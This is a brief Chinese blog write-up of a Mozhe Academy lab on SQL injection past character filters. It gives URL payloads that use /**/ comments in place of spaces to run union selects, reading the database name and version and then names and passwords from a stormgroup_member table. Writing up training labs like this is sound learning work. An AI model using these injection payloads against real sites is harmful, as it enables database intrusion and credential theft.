墨者学院 - SQL过滤字符后手工注入漏洞测试(第1题)

版权声明:原创 多崎巡礼,未经许可禁止转载! https://blog.csdn.net/qq_42357070/article/details/82885533

一开始怎么加字符都不行,才发现应该是检测到我注入以后跳转了;

(过滤了空格和一些常规查询字符,“+”号也过滤了,大小写不能绕过那就URL编码吧)

和以往的套路一样,猜得到字段是4个。。。

http://219.153.49.228:44375/new_list.php?id=-1/**/union/**/select/**/1,database(),version(),4

url编码构造如下

2.png

md这墨者真的是有毒,就不能一个个写清楚嘛??!

3.png

http://219.153.49.228:44375/new_list.php?id=-1/**/union/**/select/**/1,name,password,4/**/from/**/stormgroup_member/**/limit/**/2,1

url编码构造

自己构造去,写成这样够給意思了

猜你喜欢

转载自blog.csdn.net/qq_42357070/article/details/82885533